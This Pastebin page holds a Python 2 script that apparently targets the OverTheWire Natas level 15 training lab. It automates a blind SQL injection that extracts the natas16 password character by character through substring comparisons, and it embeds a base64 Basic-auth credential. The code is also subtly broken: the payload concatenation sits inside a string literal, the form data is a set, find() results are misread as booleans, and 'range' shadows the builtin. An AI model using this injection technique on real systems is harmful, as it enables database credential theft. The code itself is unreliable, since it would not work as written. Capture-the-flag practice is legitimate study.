Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #########################
- # ASCII TABLE
- # '0' -> 48, '9' -> 57
- # 'A' -> 65, 'Z' -> 90
- # 'a' -> 97, 'z' -> 122
- #########################
- #############################
- # Imports
- import os
- import sys
- import requests
- #############################
- # Global Variables
- bruteforced_password=""
- password_length=32
- current_password_character_index=1
- password_character_iterate=''
- # 1 -> 0 to 9, 2 -> A to Z, 3 -> a to z
- current_range=1
- # Result Strings
- result_string_true="This user exists."
- result_string_false="This user doesn't exist."
- result_string_error="Error in query."
- http_sql_injection_username_parameter_string=""
- http_request=""
- http_response=""
- #############################
- # Functions
- # Function to set http string
- def set_http_string ( mode, character ):
- global http_sql_injection_username_parameter_string
- # Mode 1 -> Equal, Mode 2 -> More or Equal, Mode 3 -> Less or Equal
- if ( mode == 1):
- http_sql_injection_username_parameter_string="natas16\" and ascii(substring((SELECT password from users where username=\"natas16\"),' + str(current_password_character_index) + ',1))=' + str(ord(character)) + ' and password like \"%"
- elif ( mode == 2):
- http_sql_injection_username_parameter_string="natas16\" and ascii(substring((SELECT password from users where username=\"natas16\"),' + str(current_password_character_index) + ',1))>=' + str(ord(character)) + ' and password like \"%"
- else:
- http_sql_injection_username_parameter_string="natas16\" and ascii(substring((SELECT password from users where username=\"natas16\"),' + str(current_password_character_index) + ',1))<=' + str(ord(character)) + ' and password like \"%"
- return
- # Function to Get Range
- # Return 1 for 0-9, 2 for A-Z, 3 for a-z, 4 for error
- def Get_Range ():
- global http_sql_injection_username_parameter_string
- global http_request
- global http_response
- # Get the range, through less than or equals#
- # Check if character is within 0-9
- set_http_string(3, '9')
- print 'bobo'
- print http_sql_injection_username_parameter_string
- http_request = requests.post('http://natas15.natas.labs.overthewire.org/index.php', headers = {'Authorization': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg=='}, data = {'username', http_sql_injection_username_parameter_string})
- http_response = http_request.text
- # If it is within 0-9
- if http_response.find(result_string_true):
- return 1
- elif http_response.find(result_string_error):
- return 4
- # Check if character is within A-Z
- set_http_string(3, 'Z')
- http_request = requests.post('http://natas15.natas.labs.overthewire.org/index.php', headers={'Authorization:': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg=='}, data={'username', http_sql_injection_username_parameter_string})
- http_response = http_request.text
- # If it is within A-Z
- if http_response.find(result_string_true):
- return 2
- elif http_response.find(result_string_error):
- return 4
- # Check if character is within a-z
- set_http_string(3, 'z')
- http_request = requests.post('http://natas15.natas.labs.overthewire.org/index.php', headers={'Authorization:': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg=='}, data={'username', http_sql_injection_username_parameter_string})
- http_response = http_request.text
- # If it is within a-z
- if http_response.find(result_string_true):
- return 3
- elif http_response.find(result_string_error):
- return 4
- return 0
- # Function to Brute Force Password
- def BruteForcePassword ( range ):
- BruteForcePassword_Password_Character=''
- # Range is 0-9
- if range==1:
- for code in range(ord('0'), ord('9') + 1):
- if Check_HTTP_Character(chr(code))==0:
- BruteForcePassword_Password_Character = chr(code)
- # Range is A-Z
- elif range==2:
- for code in range(ord('A'), ord('Z') + 1):
- if Check_HTTP_Character(chr(code))==0:
- BruteForcePassword_Password_Character = chr(code)
- # Range is a-z
- elif range==3:
- for code in range(ord('a'), ord('z') + 1):
- if Check_HTTP_Character(chr(code))==0:
- BruteForcePassword_Password_Character = chr(code)
- return BruteForcePassword_Password_Character
- # Function to Check HTTP Character
- # [Returns] 0 -> Correct Character, 1 -> False Character, 2 -> Error in SQL Query
- def Check_HTTP_Character ( Check_HTTP_Character_character ):
- global http_sql_injection_username_parameter_string
- global http_request
- global http_response
- set_http_string(1, Check_HTTP_Character_character)
- http_request = requests.post('http://natas15.natas.labs.overthewire.org/index.php', headers={'Authorization:': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg=='}, data={'username', http_sql_injection_username_parameter_string})
- http_response = http_request.text
- if http_request.find(result_string_true):
- return 0
- elif http_request.find(result_string_false):
- return 1
- else:
- print 'Error in SQL Query...'
- exit()
- ###############################
- # Main Function
- while (current_password_character_index<=32):
- # Call Get Range Function, 0 -> This shouldnt be returned, 1 -> 0-9, 2 -> A-Z, 3 -> a-z, 4-> error in sql query
- current_range = Get_Range()
- # Error Code 0
- if current_range==0:
- print 'Program should not return this...'
- break
- # Range is 0-9 or Range is A-Z or Range is a-z
- elif current_range==1 or current_range==2 or current_range==3:
- Password_Character = BruteForcePassword(current_range)
- bruteforced_password=bruteforced_password+Password_Character
- # Error in SQL Query
- elif current_range==4:
- print 'Error in SQL Query'
- break
- print 'Loop Count: ' + str(current_password_character_index)
- print 'Current Brute Forced Password: ' + bruteforced_password
- current_password_character_index+=1
- print 'Password for natas16 is ' + bruteforced_password
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
